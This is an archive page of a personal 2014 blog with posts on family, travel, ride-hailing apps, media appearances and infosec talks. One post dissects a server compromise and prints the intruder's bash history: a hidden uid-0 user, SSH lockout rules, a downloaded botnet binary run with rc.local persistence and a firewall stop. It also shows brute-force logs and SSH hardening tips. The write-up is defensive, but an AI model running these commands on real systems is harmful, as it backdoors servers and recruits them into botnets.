Archive | 2014

Merry Christmas & A Happy New Year For 2015!

I had a wonderful xmas and I hope you did too, my mom was over from the UK to visit for the festive period (and to visit her new cute grandson of course).

Merry Xmas 2014

We had some friends over, we had some epic food (I made siu yuk and bbq pork ribs!) and great gifts (although the presents were mostly for Liam this year haha).

Xmas Spread

I got amazing presents from my wife though, some super cool Rayban sunglasses and something I’ve wanted so much I almost cried when I opened the present – a Sony Z3 – my old phone was getting really decrepit.

Xmas Pressies!

Of course we had amazing desserts too! This year we had green/red meringues to make eton mess with – yum!

Xmas Eton Mess

Had a truly awesome day, thanks for all who came 🙂 Here’s to an incredible 2015!

Tags: , , ,

Continue Reading · No Comments · Family

Less Than 4 Minutes On Sky News

Yah, that’s what I appeared for recently haha. I did a short segment on SkyNews regarding the Sony hack and the possibility of it being a North Korean cyber warfare strike.

Sky News Logo

Short segment but I think we covered quite a lot of ground, I’d love to have talked about it a bit more – but well I looked like a dishevelled hobo with a cool flaming mario t-shirt.

It’s a pretty interesting story and I did a summary post about it on Darknet here: Sony Pictures Hacked – Employee Details & Movies Leaked.

Yah my claim for fame this month haha.

Tags: , , , , , ,

Continue Reading · No Comments · Hacking & Infosec, Media Coverage

My Experience With Uber vs MyTeksi In Malaysia

So yah, if you live in Malaysia you know about the taxi situation. I’m pretty sure we’ve all had some experiences with the poorly maintained, rude, cut-throat taxi drivers that are one of the worst things about this beautiful country.

Even if you don’t take taxis much (like me), you will experience them driving like absolute dicks on the road. One even banged me before, Stupid Taxi Drivers..

Get FREE Uber Credits Now HERE – Free Uber Rides

Uber vs MyTeksi in Malaysia

Taxi Drivers in Malaysia are Known For:

  • Not wanting to use the meter.
  • Refusing the journey if it’s too ‘short’, too ‘long’
  • Refusing or charging extra because it’s vaguely jammed along the way
  • Refusing or charging extra because or it’s raining.
  • Driving like idiots (not signalling, stopping abruptly, blocking traffic etc)
  • Having poorly maintained cars
  • Having smelly/smoky cars
  • Playing weird music
  • Talking crap
  • Not knowing how to go to the destination (or sometimes where it is)

There’s more, but yah – you get the gist of it. Anyway, thankfully in the past few years there’s been a few startups trying to address this issue. I did try radio cabs (Sunlight) before when my car was in the workshop for an overhaul, and well that didn’t go very pleasantly either – No Taxi – Malaysian Taxis Are Teh SUCK.

So yah, I’m super grateful for MyTeksi, EasyTaxi, Taxi Monger and more recently of course (with all the drama attached) – Uber.

Anyway, recently I’ve had quite a few events in KL and Bangsar, and I decided not to drive, so on both occasions I took MyTeksi from home to the venue, and Uber back. Partially because where I live (in the ‘burbs) there are no Uber cars, and partially because I wanted to compare the prices/service etc. As I’ve heard quite often Uber, works out cheaper. So yah, here is my take on Uber vs MyTeksi In Malaysia.


MyTeksi Logo

So MyTeksi has been around quite a while, now generally known as GrabTaxi (regionally) because the localised spelling of Teksi made no sense outside of Malaysia. They are well funded, and just got another $65 Million USD (Taking the total to $90 Million USD).

They exist to solve the problem with errant taxi drivers in Malaysia and allow some kind of rating system, plus removal of drivers from the system that get bad reports against them. All drivers must use the meter.


  • Pretty easy to find a taxi, wherever you are in KL (even in my ‘burb)
  • Easy to use app
  • Usually get a taxi quite fast

My experience on the whole with MyTeksi has been a positive one, the app has worked well, the taxis have always arrived in a timely fashion, been polite, driven well and charged according to the meter.


  • It’s still a Malaysian taxi..many are badly maintained, old, smelly etc
  • Can be hard to find a taxi when it rains or during rush hours (even though are a lot around, no-one accepts)
  • The drivers still really actively choose if they want to pick you up or not
  • The receipt is basic and doesn’t let you know the cost or show you the route the car took
  • Can cost more than Uber (especially if there’s traffic etc)
  • You need to carry cash, there’s no other way to pay in Malaysia
  • If the driver did overcharge you, there’s not much you can do


Get FREE Uber Credits Now HERE – Free Uber Rides

Uber Logo

So Uber is a fairly new contender on the block and has caused a lot of drama recently with the issues of legality, the threat to the taxi industry and so on. It’s been around since 2009 and is also heavily funded, but just came to Malaysia fairly recently.

It’s like a ridesharing + limo service app – which is cool.


  • If there is a car in your area, it has to come and it will. The drivers are employed.
  • The cars are clean, new and comfortable (I’ve had a Camry both times).
  • The drivers are polite, ask you if you like the music and drive well
  • The cars often have free mineral water (great if you’ve been drinking)
  • You don’t need cash
  • Splitting the cost of a ride is super easy
  • If the driver went the wrong way, Uber will correct the fare and give you a refund
  • The receipt is very detailed and even shows you the route you took on a map.

Uber Route


  • It can be hard to get a car, especially if you aren’t in central areas (KL, Bangsar etc)
  • Can be expensive if it’s a really popular time (multipliers)

Honestly I’m really struggling here to find any negatives with Uber.

As for the cost, the first trip which was from my house to KL center (Starhill) the Taxi from MyTeksi cost RM48 (mostly due to the epic jam) – the estimated fare was RM21-32. The return trip with Uber cost RM31. The 2nd trip was more similar, with the Taxi it was RM30 (from my place to Bangsar South) and to come back with Uber was RM32.

If I have the choice, Uber will always be my #1. If no Uber cars are available then I’ll use MyTeksi.

Get FREE Uber Credits Now HERE – Free Uber Rides

Tags: , , , , , , , , , , , ,

Continue Reading · 2 Comments · Serious Issues

Going Almost Viral On Facebook – Yusuf Taiyoob Meme

Almost viral? Isn’t that like almost famous, or almost rich? Yah it’s not famous, or rich or in this kind viral (even though it kinda is). Anyway.

I make funny videos on instagram sometimes, I made a bunch in Europe in different countries (I meant to do one for each country, but yah I failed at that). You can see them on Instagram with the hashtag #daviesfunnyvids.

So I always knew the formula for success was a white dude speaking BM, so I did a video in that format around Hari Raya because the Yusuf Taiyoob adverts on the radio are too hilarious. If you’re not familar, they are near pornographic.

The most famous Yusuf Taiyoob meme image would be this one I guess:

Yusuf Taiyoob

Anyway I did my video about this, and it was kinda popular. It was ok on Instagram but it got a little bit wild on Facebook.

Yusuf Taiyooh by Omputeh

I loves dates, yah really.

Posted by Gareth Davies on Thursday, 24 July 2014

Ending up with over 600 likes, over 250 comments and over 1300 shares. Not too bad right, I thought it’d could have gotten much more but I just don’t have that kind of audience.

But then someone stole it, who did have the right kind of audience, guess what happened? Yah it went nuts haha with almost 16,000 likes and almost 6000 shares but no credit back to me and it wasn’t shared from the original video (they basically downloaded it, then re-uploaded on their own page).

Stolen Viral Video

What can I do? Nothing really, just enjoy the fact that I did get some kind of popularity from the video haha. I still have about 400 pending friend requests from that period.

There was even some people meme-ing me, as apparently to every Malay person I look like the WWE wrestler Big Show. Yah every time I buy a Ramly burger, it’s almost guaranteed the chap selling the food will say “Wah, abang macam big show lehh”.

Big Show Makan Kurma

So yah, it was fun, it was interesting, I shall have to think of more funny videos that I can do speaking BM.

That was my 20 minutes of fame I guess.

Tags: , , , , , , , , , , ,

Continue Reading · 2 Comments · Internet & Tech, Weird/Humour

Bangkok – Our Favourite City in Asia? And Some Tips

So yah, Bangkok..I was supposed to write this post back in 2011 sometime I guess haha, I started with 1 picture in October 2011 but it got kinda stuck there.

We really love Bangkok, we’ve been back a couple of times since – but this was our first trip so it was kind of special and it was a surprise birthday trip for Kim as well. I was trying to be more romantic, proactive etc as I was a bit of a bum most of the time haha. Plus she’d mentioned MANY times she wanted to go shopping there, check out Chatuchak etc.

Anyway I decided on Bangkok as I’d heard so many good things about it, we’d both been to Thailand and absolutely loved the food and people there but we’d never really explored Bangkok properly, and definitely not together so I went for it, I booked with AirAsia go and chose a cute boutique-ish hotel bang in the middle of Chinatown called Shanghai Mansion.

Bangkok has a whole bunch of cute and quirky hotels at reasonable prices, so do have a look outside of the chains for something different.

Anyway we arrived safely and checked in, and we were hungry, seen as though it was birthday girls weekend I let her choose what to eat…she chose to eat a whole suckling pig right next to the hotel and it was AWESOME. You can see her post about it here – The suckling pig in Bangkok.

Roast Suckling Pig

It was a bit different from the style we get here in Malaysia, it was nice but honestly we preferred how they do it here. The cool part was though they stir fried the rest of the meat with salt and pepper, which made a delicious dish to eat with our rice/veges.

We lucked out staying in Chinatown too and discovered one of our absolute favourite restaurants in Bangkok just walking distance from our hotel, more here – T&K Seafood in Bangkok’s Chinatown.

What we really adore about Thailand and especially Bangkok is the street food, it’s EVERYWHERE, it’s cheap, there’s loads of pork and it seems impossible to have a bad meal in Thailand. I mean just look at how amazing their chap fan/mixed rice is:

Thailand Mixed Rice

One thing you fast learn about Bangkok is, stick to taxis if you want to get somewhere in comfort. Taking a tuk tuk is fun, but only do it for that reason. A tuk tuk is not really any cheaper than a taxi (unless you’re perhaps a local), there’s no aircon, if it rains it sucks, if you get stuck behind something spewing diesel fumes it sucks and they will constantly hassle you to make ‘stops’ to help them out.

Every stop you make will reduce your fare by 20-40baht but take about 10-20 minutes each time, it’s worth doing once maybe just for fun. We actually did 3 stops just for shits and giggles and got the tuk tuk ride for free.

Tuk Tuk ride

But if you want to get anywhere just take a taxi, another important lesson to note – ALWAYS hail a moving cab, never take one parked at the road side (they tend to be the lazy, unscrupulous drivers).

As far as food goes there a few dishes you absolutely must try the authentic versions of in Thailand, one is Pad Kra Pao (or Krapow) which is basically minced pork fried with loads of basil – super delicious. This one was inside Chatuchak market:

Pad Kra Pao

The other is of course braised pig leg rice which you can find everywhere and the good ones will simply blow your mind. Talking of Chatuchak, the place is immense and there’s a LOT of people, if I can give you one tip for Chatuchak it is – if you see something you like, just buy it, because the chance of you being able to locate the same stall again is slim to none.

Chatuchak Market

The birthday girl had a great time shopping of course and LOVED Chatuchak market as expected.

Kimberlycun at Chatuchak

The other place we’d heard a lot about was Platinum Mall so we spent a day there to check it out. Talking of stewed pork leg, the one at the Platinum Mall food court is definitely one of the best ones I’ve had, so if you do head there – check it out!

Platinum Mall - Bangkok

Platinum mall is like a smaller, more comfortable version of Chatuchak with aircon and much easier to navigate. The major downside I noticed was there’s very little mens stuff in Platnium, compared to Chatuchak which also has other interesting sections (home, gardens, pets etc).

But the shopping experience at Platinum is much less sweaty and the food in the food court is tops! But even then, we still headed back to Chatuchak the next day for another go haha, and we managed to locate the legendary coconut ice cream, another memorable food from BKK.

Chatuchak Coconut Ice-cream

So yah that sums up Bangkok pretty much, shop, food, shop, food, massage, pass out – wake up and repeat. Super awesome!

Kinda miss Bangkok actually, can’t wait to take Liam there! Although now I’m older, I kind of enjoy the serenity of Bali too. Ah so many places to go…haven’t even been to Japan at all yet!

Tags: , , , , , , , , , , ,

Continue Reading · 2 Comments · Thailand, Trips & Travel

What It’s Like To Be The Father Of A Premature Baby (Premie)

Pregnancy itself is a roller-coaster, even the ideal pregnancy I would imagine is quite a stressful experience for the first time parents (especially the one with a tiny human growing in her belly). We honestly did not have the easiest pregnancy, at some points it was downright terrifying – especially seeing blood during the exact time when we were supposed to announce to the World that we were having a baby. The magical 3 months mark – Red tide.

And yes it happened again in May, not a good sign, but nothing we could do – nothing the Doctor could tell us..and upon reading far too much, is fairly normal (happens to about 20% of pregnant women). The only bad part, was it’s a fairly strong indicator of premature birth.

There’s 2 things in life I really strongly dislike, complaining and worrying (almost the same thing in fact..). Worry is pointless, if you can do something about it, do it. If you can’t, worrying isn’t going to change anything. Same for complaining, don’t complain, do something to change it, fix the situation, take action – don’t just whinge.

A lot of it can be alleviated by knowledge anyway, read, read, educate yourself and it becomes a lot easier to not worry (or the opposite sometimes when you read too much). Anyway, that’s my philosophy in life and I had to work extra hard to maintain it at certain points during the pregnancy, as it wasn’t an easy one in general.

On the whole it was wonderful though, Kim felt great and she was a glowing, beautiful, vibrant surprise pregnant lady (we consider a surprise mom when you see a hot chick from the back and she turns to the side or around and boom there’s a massive baby bump). She had very few serious symptoms, some morning sickness early on, no really crazy cravings, not much pain/discomfort. Other than the blood etc, it was a textbook pleasant pregnancy.

It was pretty stressful though, every day without blood was a blessing. Then things escalated fairly quickly, 11th July (around 29 weeks gestation) we had ‘The Show’ which is technically the body of the mother saying it’s ready to party, let’s get the baby out. I saw what looked an awful lot like a mucus plug (yes I Google Imaged it..I don’t recommend doing that).

This is when I started reading voraciously about all kinds of symptoms, probabilities, birth stages (micro preemies, early preemies, moderately premature etc etc), and was hoping we could make it to at least 34-35 weeks gestation as our little man would be pretty much fully developed by then and fairly well equipped to come out.

After ‘The Show’ we went to A&E and called our Doctor in to check things out, she said the cervix was a little soft and having a look at the picture of the mucus plug..she said it did very much look like a show and we needed to take precautions for premature birth – which is basically 2 steroids shots 12 hours apart to help along the lung development of the little one when he comes out.

As far as babies go, all systems are pretty much go from 28 weeks onwards, but the lungs are last to develop and be ready to take in outside air. Preemie lungs have issues due to a lack of surfactant which basically lubricates all the little tubes and stops them collapsing.

Most premature babies are born with some kind of respiratory distress (Which is why you see them on breathing apparatus). Anyway the earliest preemie stage which is unlikely to have any serious long term effects in 32 weeks, also has a 98% survival rate – which is good obviously.

Anyway after the steroid shots Kim just took it easy and was pretty much on bed rest, not moving a whole lot. We were just hoping and praying (in a non-religious way) that he would stay in as long as possible, as the last few weeks of gestation are when there is exponential growth and development of the body, brain, immune system, nervous system and much more.

So yah, July 30th I was supposed to go to the office, but Kim didn’t seem to be feeling to well, and I just had a bad feeling and thought I should stay at home. Lucky I did as the missus stayed in bed all day, she went to pee around 5pm and I heard a scream from upstairs.

I rushed up and found a wet floor..which I examined closely (yes I smelt it)…you smell it to make sure it’s not pee, to make sure it has no foul smells and you check it to make sure it’s clear and has no black/green tint. A black/green tint would indicate the baby is not coping well and needs to come out ASAP (emergency C-section).

The water had broken, but it didn’t seem to be a can read this part from Kim’s perspective too here: I have popped and this is how it went down..

Anyway, however little or much water broke (I suspected it was the hind waters, not the main sack) we rushed to the hospital and went straight into a labour room. I read up and found the probability of going into labour in the next 24 hours was 50% or higher. I was hoping we were in the other 50% that could go 4-6 weeks with a drip/leak/hind water burst as amniotic fluid does constantly regenerate and after an ultrasound the main sac was still full.

Stay positive and all that, I hung out in the hospital till about 3am then went home to get some sleep. There was no contractions or major dilation (around 1cm) so we were hopeful that he could stay in until at least 36 weeks.

But no, he wasn’t having any of it. I got a panicked call from Kim around 10am saying it was on, she was having major contractions and they’d started at about 5.30am and were getting closer and stronger.

I decided I should probably go into the hospital, so I packed the bag full of stuff we might need and off I went.

It was all very sudden, we seriously had nothing ready – we had a stroller and a car seat I bought because I saw the exact model we wanted on sale. But literally nothing else, no clothes, no diapers, no cot, nothing.

I got to the hospital and Kim was already super drowsy from the gas and air she was sucking on like a crack pipe, she wouldn’t let it go. I have to say, that contraction business looks bloody painful. By about 11am she was screaming for an epidural, but the Doctor said it was too late, she was already 6cm dilated (so 60% of the way there), her contractions were too close together and she was progressing that fast it was going to be over soon anyway.

She was grabbing my hand so hard my fingers almost dropped off (ribena purple they were), but hey, I was happy to bear that rather than pooping out a 2kg human from any of my body orifices.

Things went pretty fast and our son was born pretty smoothly at 1.52pm July 31st 2014 without complications at 32 weeks 4 days (other than him being almost 8 weeks early) his due date was September 22nd. So yah, he was supposed to be born yesterday (relative to when the this post was written).

But as someone so wonderfully put it, this way we get to spend an extra 2 months with him!

Seeing your wife give birth naturally (or even cesarean I would imagine) is not an experience for the faint hearted, government hospitals no longer let the fathers be present during birth as they just don’t have enough resources to deal with all the fainting/puking etc.

Thankfully my constitution is ok I think as I managed to stay concious through-out the entire thing, and didn’t puke and even took some pictures of ‘that’ moment. Although I wasn’t exactly looking directly, so I think they are blur/overexposed haha.

This is how he looked when he was born, covered in the waxy vernix layer, goo and blood having any residual amniotic fluid/gunk sucked out of his nose/mouth with a tube wrapped in a plastic bag to keep him warm. The first thing he did? Peed on the nurse – good lad! Not exactly cute at this stage tho.

32 Week Old Premature Baby

Kim was fine afterwards just tired, she had a sleep and I went to see baby Liam in NICU (neonatal intensive care unit) where we spent many hours for the next 3 and a half weeks. More about that later, I took her up to see him the same day so they could meet the day he was born. We couldn’t hold him yet though as he was still on the CPAP machine (Continuous Positive Airway Pressure) as he did have some respiratory distress.

So the first time mommy and me could hold him was the first day after his birth. He even opened his eyes a bit and grabbed my finger like a little boss, we were so proud that he was already off the CPAP and onto the regular nasal prongs. Far cuter, like a little wrinkly old man.

32 Week Preemie

So yah, that’s the story of our pregnancy and birth from my perspective, and the first thoughts/feeling of being the father of a premature baby. My #32weeker 🙂

If you want to see far too much of him, just follow me on Instagram @ShaolinTiger and his Mommy at @Kimberzilla.

Tags: , , , , , , , , , ,

Continue Reading · 2 Comments · Children, Family

Advanced Information Gathering AKA Google Hacking at HITB 2004

So this was the first real talk I gave, I’d just moved to Malaysia not long beforehand and I’d started work at NSS as the lead for the penetration testing team. We were a sponsor of Hack in the Box 2004 so we got a speakers slot, but it couldn’t be a product/company pitch it had to be a proper infosec/technical talk which passed the regular CFP (Call for paper) requirements.

It was decided that I give the talk..I was very nervous as you can imagine, even back then it was rather a large conference, and this was my first real shot at talking. Looking back at the slides 10 years later though, I think I did a pretty good – much of the information is still relevant today.

And when I gave the talk the room was packed, people were standing and listening. I think because it was actually one of the less technical talks, more people could enjoy it – it went down really well. The subject was something I did at work, and often the first stage in a penetration test – information gathering. Arguably it’s also the most important phase as it gives you all the entry points and people to target in later phases. The hot keywords at that time were Google Hacking and the GHDB (Google Hacks Database).

Information Gathering AKA Google Hacking

It was about 6 years after this that I gave me next talk, not sure why – perhaps just lack of opportunity. I also did an interview with The Star afterwards titled Guarding against Google hacking, where I met Chris Chong.

Google Hacking - The Star

The talk covers the lesser known aspects of Google, tools such as Athena and Sitedigger and the amount of random misconfiguration that can be found with a little careful search engine manipulation. Other useful public databases will be covered with some details on how to leverage the maximum amount of detail on any given target.

Also an introduction to the Google API and how it can be used or abused during a penetration test or hack attempt. This presentation will include a live demonstration in which the above techniques will used to gather coveted information about both random and targeted organizations.

So here are the slides:

And the video (yah we had recordings back then, shared via Torrent!):


You can see all my talks given here.

Tags: , , , , , , , , , ,

Continue Reading · No Comments · Hacking & Infosec

An Anatomy Of A Hack – Weak ROOT Password

So a peaceful Sunday night, I get an odd bandwidth warning for a development/testing server that a developer recently created. It was doing some fairly immense traffic, peaking at 80mb a second and averaging about 8mb/s – definitely not normal.

Image 2014-08-31 at 8.42.18 PM

I tried to access the server via SSH but couldn’t connect at all, port 22 was connection reset by peer (which indicates a block or drop) and our normal port wasn’t responding at all.

I accessed the server via the Linode LISH console, but it wasn’t accepting any of our secure passwords, so I shut it down and used the Linode manager to reset the root password. This then allowed me to boot it up and access it via LISH with the root user.

What I discovered next was the reason why I couldn’t SSH in either on port 22 the default port, or our regular SSH port (which is not 22). I could see from these lines in the .bash_history for root that SSH had been blocked for everyone except 2 IP addresses.

Which would prevent any SSH access at all.

So they logged in, created a user called restart, blocked everyone but 2 IP addresses from accessing via SSH, then downloaded a piece of malware (or what I assume to be a botnet client) from the first IP address

Then they ran this, and added it to /etc/rc.local to make sure it runs on restart. Here’s the full history:

1 w
2 uname -a
3 ethtool eth0
4 ifconfiog
5 ifconfig
6 last
7 useradd -g 0 -u 0 -o restart
8 echo restart:restart |chpasswd
9 echo "sshd:" >> /etc/hosts.allow
10 echo "sshd:" >> /etc/hosts.allow
11 echo "sshd:ALL" >> /etc/hosts.deny
12 cd /tmp/scp
13 ls
14 chmod 777 *
15 ./x 5.153
16 ls
17 chmod 777 *
18 ./x 5.153
19 cd /etc
20 wget
21 chmod 0755 com
22 ./com &
23 chattr +i com
24 echo "cd /root/">>/etc/rc.local
25 echo "./com&">>/etc/rc.local
26 echo "/etc/init.d/iptables stop">>/etc/rc.local

I uploaded the malware to VirusTotal to scan it and see what it turned up:

VirusTotal Scan

The only decent description I found was from Telus:

Backdoor.Linux.Ganiw.A is a Backdoor and Bot agent that targets the Linux platform. The malware contacts a remote server, identifying itself, and sending system information. In addition, it receives control commands to perform various nefarious activities on the infected system. Moreover, the malware has the capabilities to embark on different types of DoS attacks. To survive a system reboot, it adds an entry to the initialization directory “/etc/init.d”.

As for the actual entry, it seems like the password was popped by a different IP address (Also from China), and then later on the same day, it was logged into by our main IP address

Aug 30 01:46:43 li737-216 sshd[20132]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:46:45 li737-216 sshd[20134]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:46:47 li737-216 sshd[20134]: Failed password for root from port 4670 ssh2
Aug 30 01:46:58 li737-216 sshd[20134]: message repeated 5 times: [ Failed password for root from port 4670 ssh2]
Aug 30 01:46:58 li737-216 sshd[20134]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:00 li737-216 sshd[20136]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:01 li737-216 sshd[20136]: Failed password for root from port 4526 ssh2
Aug 30 01:47:12 li737-216 sshd[20136]: message repeated 5 times: [ Failed password for root from port 4526 ssh2]
Aug 30 01:47:12 li737-216 sshd[20136]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:14 li737-216 sshd[20138]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:15 li737-216 sshd[20138]: Failed password for root from port 3781 ssh2
Aug 30 01:47:25 li737-216 sshd[20138]: message repeated 5 times: [ Failed password for root from port 3781 ssh2]
Aug 30 01:47:25 li737-216 sshd[20138]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:27 li737-216 sshd[20140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:29 li737-216 sshd[20140]: Failed password for root from port 4405 ssh2
Aug 30 01:47:39 li737-216 sshd[20140]: message repeated 5 times: [ Failed password for root from port 4405 ssh2]
Aug 30 01:47:39 li737-216 sshd[20140]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:41 li737-216 sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:44 li737-216 sshd[20144]: Failed password for root from port 1662 ssh2
Aug 30 01:47:54 li737-216 sshd[20144]: message repeated 5 times: [ Failed password for root from port 1662 ssh2]
Aug 30 01:47:54 li737-216 sshd[20144]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:55 li737-216 sshd[20146]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from port 4220 ssh2

Then the login:

Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from port 3117 ssh2

As a rule I disable root login via SSH, move it to a different port (not 22), disable password based logins, and use a limited list of users that can access SSH. This makes it pretty secure and can be done with the following SSH settings:

Port 888
PermitRootLogin no
PasswordAuthentication no

Then restart SSHd of course. Generally choose a port below 1024, as then it’s still a privileged port and can’t be hijacked by a non-root user (for the paranoid).

This server was only 11 days old, fortunately it has nothing important on it and doesn’t have access to anything else. Just be warned, even if you are disabling root login later, put a secure password in from the you might forget about the server for a while.

And then it’ll get owned by some Chinese hacker and turned into part of their botnet for hire.

There’s really not ever any excuse to have a weak root password.

Tags: , , , , , , , , ,

Continue Reading · 2 Comments · Hacking & Infosec

Oldskool Car Porn: The 1990 Lotus Carlton

I can never forget this car, seriously. My uncle drove a lot for work, I never knew exactly what he did, but he was the first person I knew that owned a laptop. He worked in some kind of manufacturing industry and was possibly a rep/salesman.

Which suits this car, well the original version anyway – the rather boring Vauxhall Carlton (along with the Ford Sierra) was a stock 90s salesman car.

1986 Vauxhall Carlton

Certainly not the most exciting car on the block. Until 1990 anyway.

I remember my uncle was looking for a new car and I happened to join him as he’d found a Lotus Carlton he’d like to look at, he didn’t know much about the car, and well nor did I. There wasn’t a whole lot of Internet back then, and there certainly wasn’t the abundance of information on sites like Wikipedia. It just so happened the car he wanted to look at was near where I lived, so he was coming down from Birmingham to have a look. I’d guess this was probably around 1992-1994 period, so the car was likely new, or barely used (1-2 years old).

When I saw it, I was that it? I was pretty underwhelmed to be honest. For a £48,000 car (which was an enormous amount of money back then).

Lotus Carlton

Even the interior was kind of drab, dull and plasticy. It just had the odd Lotus emblem here and there.

Lotus Carlton Interior

Little did I realise this was a 377bhp, 3.6L twin turbo BEAST which could reach 100mph (160km/h) in less than 17 seconds. So we sat it in, took it for a test drive. It seemed fairly ordinary as we tootled around, then we reached the sliproad to the motorway.

We weren’t going slow, my uncle was in third gear as he reached the merge and he accelerated hard to pull onto the motorway at a decent speed (as you would)..the car span its wheels like a drag bike on a leash.

And once it found grip…it pressed my head so hard into the back of the seat I thought my eyeballs were going to collapse. It was quite an eye watering ride.

And yah, at that point I realised this car was really something special. I read whatever I could about it and was amazed to find that it could outperform the top supercars of that era like the Ferrari Testarossa which could do 0-60mp/h in only 5.3 seconds and had a top speed of 180mph (only 3 mph more than the Carlton!).

For a 4 door sedan..full of people, speeding along like a bullet train. Quite a crazy (and scary) proposition). Also the fact that it was a target for car thieves and criminals as the police didn’t have any cars fast enough to chase it made it a little unpractical.

Sadly my uncle didn’t buy the car, so I didn’t get to sit in it (or any other) ever again. There was only 320 Lotus Carlton’s released in the UK, so it is a rare car. Even now, 20+ years later they are fetching good money for mint condition examples (£12-20,000).

There is a modern day equivalent or a spiritual successor (in some ways), the Vauxhall VXR8.

But yah, something I still remember so vividly from my younger years. Some videos for reference..

Fifth Gear Vauxhall VXR8 vs Lotus Carlton

Top Gear Lotus Carlton

Autocar heroes: Lotus Carlton video review

Tags: , , , , , , , , ,

Continue Reading · No Comments · Cars/Motorsport

An Introduction To Information Security – OpenCoffeeClubKL #31

So I gave a talk about infosec stuff in July at OpenCoffeeClub KL, as it’s what I used to do for a living – people were always asking me to share a little more about it.

The timing is a little odd again, as it happens. In 2011 I did 2 talks in the same month, 1 on WordPress (High Performance WordPress – Scaling, Tuning, Optimizing & More) & one which was more random (The History Of The Future at WebCamp KL).

In 2012 I ended up doing 2 presentations in the same week (actually on 2 consecutive days), and once again the first was technical and the second a bit more random.

The first one was about MongoDB and was for the KL Mongo User Group AKA KL MUGHigh Availability MongoDB & Replica Sets – A How To & Kinda Tutorial.

The second was to a bunch of copywriters about blogging – Blogging WTF? At The Last Word KL – A Meeting For Copywriters.

I guess I skipped on 2013, and here I am in 2014 – giving 2 talks almost in the same month again, the first being this one actually and the second was Building Scalable Web Apps – LVL.UP KL – July 2014

My talk was about 15 minutes and titled “Introduction to Information Security” – which covers some basics on what Information Security is, how it can impact your business and some tips on how to mitigate against risk.

An Introduction To Information Security

Here are the slides:

And the video (the front got cut off slightly – but nothing important, only when I was talking about myself):

So yah, an introduction to infosec – if you do have any further questions drop them in the comments below!

You can see all my talks given here.

Tags: , , , , , , , , , , ,

Continue Reading · No Comments · Hacking & Infosec